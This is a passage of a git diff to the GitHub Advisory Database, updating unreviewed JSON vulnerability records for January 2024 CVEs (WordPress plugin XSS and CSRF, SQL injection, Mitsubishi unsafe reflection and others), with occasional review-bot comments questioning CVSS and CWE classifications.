@@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-86rg-pf4c-5grg", - "modified": "2024-01-04T12:30:20Z", - "published": "2024-01-04T12:30:20Z", - "aliases": [ - "CVE-2023-6944" - ], - "details": "A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6944" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2023-6944" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255204" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200", - "CWE-209" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-04T10:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-87hh-r9jv-r2jq/GHSA-87hh-r9jv-r2jq.json b/advisories/unreviewed/2024/01/GHSA-87hh-r9jv-r2jq/GHSA-87hh-r9jv-r2jq.json new file mode 100644 index 0000000000000..a82ce0b9265f6 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-87hh-r9jv-r2jq/GHSA-87hh-r9jv-r2jq.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87hh-r9jv-r2jq", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-22146" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magazine3 Schema & Structured Data for WP & AMP allows Stored XSS.This issue affects Schema & Structured Data for WP & AMP: from n/a through 1.25.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22146" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/schema-and-structured-data-for-wp/wordpress-schema-structured-data-for-wp-amp-plugin-1-25-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-893r-3jv5-xxp5/GHSA-893r-3jv5-xxp5.json b/advisories/unreviewed/2024/01/GHSA-893r-3jv5-xxp5/GHSA-893r-3jv5-xxp5.json new file mode 100644 index 0000000000000..b4223beae7030 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-893r-3jv5-xxp5/GHSA-893r-3jv5-xxp5.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-893r-3jv5-xxp5", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22289" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in cybernetikz Post views Stats allows Reflected XSS.This issue affects Post views Stats: from n/a through 1.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22289" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/post-views-stats/wordpress-post-views-stats-plugin-1-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-89c9-2mcj-c9gr/GHSA-89c9-2mcj-c9gr.json b/advisories/unreviewed/2024/01/GHSA-89c9-2mcj-c9gr/GHSA-89c9-2mcj-c9gr.json new file mode 100644 index 0000000000000..ffe5295c15950 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-89c9-2mcj-c9gr/GHSA-89c9-2mcj-c9gr.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89c9-2mcj-c9gr", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-1061" + ], + "details": "The 'HTML5 Video Player' WordPress Plugin, version < 2.5.25 is affected by an unauthenticated SQL injection vulnerability in the 'id' parameter in the  'get_view' function.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1061" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/research/tra-2024-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T09:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-89ph-wr9x-hcfc/GHSA-89ph-wr9x-hcfc.json b/advisories/unreviewed/2024/01/GHSA-89ph-wr9x-hcfc/GHSA-89ph-wr9x-hcfc.json index c674ac2e1fa45..f2559fba0e56e 100644 --- a/advisories/unreviewed/2024/01/GHSA-89ph-wr9x-hcfc/GHSA-89ph-wr9x-hcfc.json +++ b/advisories/unreviewed/2024/01/GHSA-89ph-wr9x-hcfc/GHSA-89ph-wr9x-hcfc.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31446" }, + { + "type": "WEB", + "url": "https://blog.kscsc.online/cves/202331446/md.html" + }, { "type": "WEB", "url": "https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution" diff --git a/advisories/unreviewed/2024/01/GHSA-8c2v-657f-h9r7/GHSA-8c2v-657f-h9r7.json b/advisories/unreviewed/2024/01/GHSA-8c2v-657f-h9r7/GHSA-8c2v-657f-h9r7.json new file mode 100644 index 0000000000000..08d0449b8b9a1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8c2v-657f-h9r7/GHSA-8c2v-657f-h9r7.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8c2v-657f-h9r7", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24139" + ], + "details": "Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24139" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/Login_System_with_Email_Verification_SQL_Injection/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8c82-xj9x-mxgj/GHSA-8c82-xj9x-mxgj.json b/advisories/unreviewed/2024/01/GHSA-8c82-xj9x-mxgj/GHSA-8c82-xj9x-mxgj.json index fa00f347237bd..3c28e4072d79b 100644 --- a/advisories/unreviewed/2024/01/GHSA-8c82-xj9x-mxgj/GHSA-8c82-xj9x-mxgj.json +++ b/advisories/unreviewed/2024/01/GHSA-8c82-xj9x-mxgj/GHSA-8c82-xj9x-mxgj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8c82-xj9x-mxgj", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-23850" ], "details": "In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ 
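Review bot: In GHSA-8c2v-657f-h9r7 the vector's `PR:H` sits oddly with the text, which describes SQL injection via the `user` parameter of a login system — a login form is normally reached before any privilege is held, and the sibling record GHSA-8mxm-prp8-gc3w (CVE-2024-24141) from the same reporter in this diff scores the same class of issue as `PR:N`. If `PR:N` is correct, the derived `"severity": "HIGH"` would become CRITICAL. The vector is mirrored from NVD and the record is marked unreviewed, so the action is to flag it for the GitHub review pass rather than to edit the mirrored value here.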
@@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T09:15:36Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8cww-gxv8-vfxm/GHSA-8cww-gxv8-vfxm.json b/advisories/unreviewed/2024/01/GHSA-8cww-gxv8-vfxm/GHSA-8cww-gxv8-vfxm.json index af639290142a9..7ba7b3afecad2 100644 --- a/advisories/unreviewed/2024/01/GHSA-8cww-gxv8-vfxm/GHSA-8cww-gxv8-vfxm.json +++ b/advisories/unreviewed/2024/01/GHSA-8cww-gxv8-vfxm/GHSA-8cww-gxv8-vfxm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8cww-gxv8-vfxm", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-22637" ], "details": "Form Tools v3.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /form_builder/preview.php?form_id=2.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8g27-wpjg-5vv9/GHSA-8g27-wpjg-5vv9.json b/advisories/unreviewed/2024/01/GHSA-8g27-wpjg-5vv9/GHSA-8g27-wpjg-5vv9.json index 0526ccb65a4cb..c2243eb9e3d29 100644 --- a/advisories/unreviewed/2024/01/GHSA-8g27-wpjg-5vv9/GHSA-8g27-wpjg-5vv9.json +++ b/advisories/unreviewed/2024/01/GHSA-8g27-wpjg-5vv9/GHSA-8g27-wpjg-5vv9.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8g27-wpjg-5vv9", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23217" ], "details": "A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. An app may be able to bypass certain Privacy preferences.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -47,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8g3w-rrg4-h6cj/GHSA-8g3w-rrg4-h6cj.json b/advisories/unreviewed/2024/01/GHSA-8g3w-rrg4-h6cj/GHSA-8g3w-rrg4-h6cj.json index 3d799404bc03e..1cdd9514dc903 100644 --- a/advisories/unreviewed/2024/01/GHSA-8g3w-rrg4-h6cj/GHSA-8g3w-rrg4-h6cj.json +++ b/advisories/unreviewed/2024/01/GHSA-8g3w-rrg4-h6cj/GHSA-8g3w-rrg4-h6cj.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8g3w-rrg4-h6cj", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-35837" ], "details": "An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. Authentication for web interface is completed via an unauthenticated WiFi AP. The administrative password for the web interface has a default password, equal to the registration ID of the device. This same registration ID is used as the WiFi SSID name. No routine is in place to force a change to this password on first use or bring its default state to the attention of the user. Once authenticated, an attacker can reconfigure the device or upload new firmware, both of which can lead to Denial of Service, code execution, or Escalation of Privileges.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T23:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8g5q-mp2w-j766/GHSA-8g5q-mp2w-j766.json b/advisories/unreviewed/2024/01/GHSA-8g5q-mp2w-j766/GHSA-8g5q-mp2w-j766.json new file mode 100644 index 0000000000000..48371604dbbfa --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8g5q-mp2w-j766/GHSA-8g5q-mp2w-j766.json 
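Review bot: GHSA-8g3w-rrg4-h6cj now carries a CRITICAL score but its `cwe_ids` array stays empty, even though the description spells out a default-credential weakness: the admin password equals the registration ID, that ID is broadcast as the WiFi SSID, and nothing forces a change on first use. Something like `"cwe_ids": [ "CWE-1392" ]` (Use of Default Credentials) would let consumers group this with other default-password findings. Separately, the text says authentication happens over an unauthenticated WiFi access point, so `AV:N` may overstate reach compared with `AV:A`; that is an NVD-side question for the review pass, not an edit to the mirror.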
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8g5q-mp2w-j766", + "modified": "2024-01-30T09:30:34Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-6943" + ], + "details": "Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to execute a malicious code by RPC with a path to a malicious library while connected to the products.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6943" + }, + { + "type": "WEB", + "url": "https://jvn.jp/vu/JVNVU95103362" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-02" + }, + { + "type": "WEB", + "url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-020_en.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-470" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8h9j-pxfp-9p97/GHSA-8h9j-pxfp-9p97.json b/advisories/unreviewed/2024/01/GHSA-8h9j-pxfp-9p97/GHSA-8h9j-pxfp-9p97.json index 8d93964d7f89e..cbe2070776259 100644 --- a/advisories/unreviewed/2024/01/GHSA-8h9j-pxfp-9p97/GHSA-8h9j-pxfp-9p97.json +++ b/advisories/unreviewed/2024/01/GHSA-8h9j-pxfp-9p97/GHSA-8h9j-pxfp-9p97.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8h9j-pxfp-9p97", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T18:31:36Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51885" ], "details": "Buffer Overflow vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via the length of the LaTeX string component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T17:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json b/advisories/unreviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json deleted file mode 100644 index b68addfacc078..0000000000000 --- a/advisories/unreviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-8j3x-w35r-rw4r", - "modified": "2024-01-25T21:32:14Z", - "published": "2024-01-25T21:32:14Z", - "aliases": [ - "CVE-2023-6267" - ], - "details": "A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6267" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2023-6267" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2251155" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-280" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-25T19:15:08Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8j5h-7rqc-9ghf/GHSA-8j5h-7rqc-9ghf.json b/advisories/unreviewed/2024/01/GHSA-8j5h-7rqc-9ghf/GHSA-8j5h-7rqc-9ghf.json index 2a48f83488dcb..ca3c0be3addd4 100644 --- a/advisories/unreviewed/2024/01/GHSA-8j5h-7rqc-9ghf/GHSA-8j5h-7rqc-9ghf.json +++ b/advisories/unreviewed/2024/01/GHSA-8j5h-7rqc-9ghf/GHSA-8j5h-7rqc-9ghf.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8j5h-7rqc-9ghf", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48130" ], "details": "An issue in GINZA CAFE mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:57Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8j8p-j2w4-2qvh/GHSA-8j8p-j2w4-2qvh.json b/advisories/unreviewed/2024/01/GHSA-8j8p-j2w4-2qvh/GHSA-8j8p-j2w4-2qvh.json index 059c79a0a0835..464decb5a7af2 100644 --- a/advisories/unreviewed/2024/01/GHSA-8j8p-j2w4-2qvh/GHSA-8j8p-j2w4-2qvh.json +++ b/advisories/unreviewed/2024/01/GHSA-8j8p-j2w4-2qvh/GHSA-8j8p-j2w4-2qvh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8j8p-j2w4-2qvh", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47192" ], "details": "An agent link vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" 
diff --git a/advisories/unreviewed/2024/01/GHSA-8jgj-565r-w957/GHSA-8jgj-565r-w957.json b/advisories/unreviewed/2024/01/GHSA-8jgj-565r-w957/GHSA-8jgj-565r-w957.json new file mode 100644 index 0000000000000..51adf66aa9958 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8jgj-565r-w957/GHSA-8jgj-565r-w957.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jgj-565r-w957", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-22143" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in WP Spell Check.This issue affects WP Spell Check: from n/a through 9.17.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22143" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-spell-check/wordpress-wp-spell-check-plugin-9-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8mj3-mj87-cf2h/GHSA-8mj3-mj87-cf2h.json b/advisories/unreviewed/2024/01/GHSA-8mj3-mj87-cf2h/GHSA-8mj3-mj87-cf2h.json index abea7bbdf23d4..af4b2367963be 100644 --- a/advisories/unreviewed/2024/01/GHSA-8mj3-mj87-cf2h/GHSA-8mj3-mj87-cf2h.json +++ b/advisories/unreviewed/2024/01/GHSA-8mj3-mj87-cf2h/GHSA-8mj3-mj87-cf2h.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-256" + "CWE-256", + "CWE-522" ], "severity": "HIGH", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2024/01/GHSA-8mxm-prp8-gc3w/GHSA-8mxm-prp8-gc3w.json b/advisories/unreviewed/2024/01/GHSA-8mxm-prp8-gc3w/GHSA-8mxm-prp8-gc3w.json new file mode 100644 index 0000000000000..09ce8041cb201 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8mxm-prp8-gc3w/GHSA-8mxm-prp8-gc3w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8mxm-prp8-gc3w", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24141" + ], + "details": "Sourcecodester School Task Manager App 1.0 allows SQL Injection via the 'task' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24141" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/School-Task-Manager-System-SQLi-1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8p2h-w6cv-wr2w/GHSA-8p2h-w6cv-wr2w.json b/advisories/unreviewed/2024/01/GHSA-8p2h-w6cv-wr2w/GHSA-8p2h-w6cv-wr2w.json new file mode 100644 index 0000000000000..5078979d6c842 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8p2h-w6cv-wr2w/GHSA-8p2h-w6cv-wr2w.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8p2h-w6cv-wr2w", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-4553" + ], + "details": "Improper Input Validation vulnerability in OpenText AppBuilder on Windows, Linux allows Probe System Files.\n\n\nAppBuilder configuration files are viewable by unauthenticated users.\n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4553" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8p37-w86w-447q/GHSA-8p37-w86w-447q.json b/advisories/unreviewed/2024/01/GHSA-8p37-w86w-447q/GHSA-8p37-w86w-447q.json index fe938aeba3fde..bde9434498b65 100644 --- a/advisories/unreviewed/2024/01/GHSA-8p37-w86w-447q/GHSA-8p37-w86w-447q.json +++ b/advisories/unreviewed/2024/01/GHSA-8p37-w86w-447q/GHSA-8p37-w86w-447q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8p37-w86w-447q", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T03:30:30Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-0587" @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-8p7h-9gqv-5fx9/GHSA-8p7h-9gqv-5fx9.json b/advisories/unreviewed/2024/01/GHSA-8p7h-9gqv-5fx9/GHSA-8p7h-9gqv-5fx9.json new file mode 100644 index 0000000000000..2da20d1b1d95d --- /dev/null 
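Review bot: GHSA-8p2h-w6cv-wr2w tags CVE-2023-4553 with `CWE-20` (Improper Input Validation), but the description — AppBuilder configuration files viewable by unauthenticated users, framed as letting an attacker "Probe System Files" — is an information-exposure or missing-access-check problem, not an input-validation one. A classification such as `"cwe_ids": [ "CWE-200" ]` (or CWE-284 if the root cause is the absent authorization check) would serve anyone filtering by weakness class better. The tag presumably comes from the CNA, so this is a note for the reviewed pass rather than an edit to the mirrored record.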
+++ b/advisories/unreviewed/2024/01/GHSA-8p7h-9gqv-5fx9/GHSA-8p7h-9gqv-5fx9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8p7h-9gqv-5fx9", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-6633" + ], + "details": "The Site Notes WordPress plugin through 2.0.0 does not have CSRF checks in some of its functionalities, which could allow attackers to make logged in users perform unwanted actions, such as deleting administration notes, via CSRF attacks", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6633" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/eb983d82-b894-41c5-b51f-94d4bba3ba39/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8pp2-pfr8-5hm5/GHSA-8pp2-pfr8-5hm5.json b/advisories/unreviewed/2024/01/GHSA-8pp2-pfr8-5hm5/GHSA-8pp2-pfr8-5hm5.json index 493954c73fc95..721798d9e850f 100644 --- a/advisories/unreviewed/2024/01/GHSA-8pp2-pfr8-5hm5/GHSA-8pp2-pfr8-5hm5.json 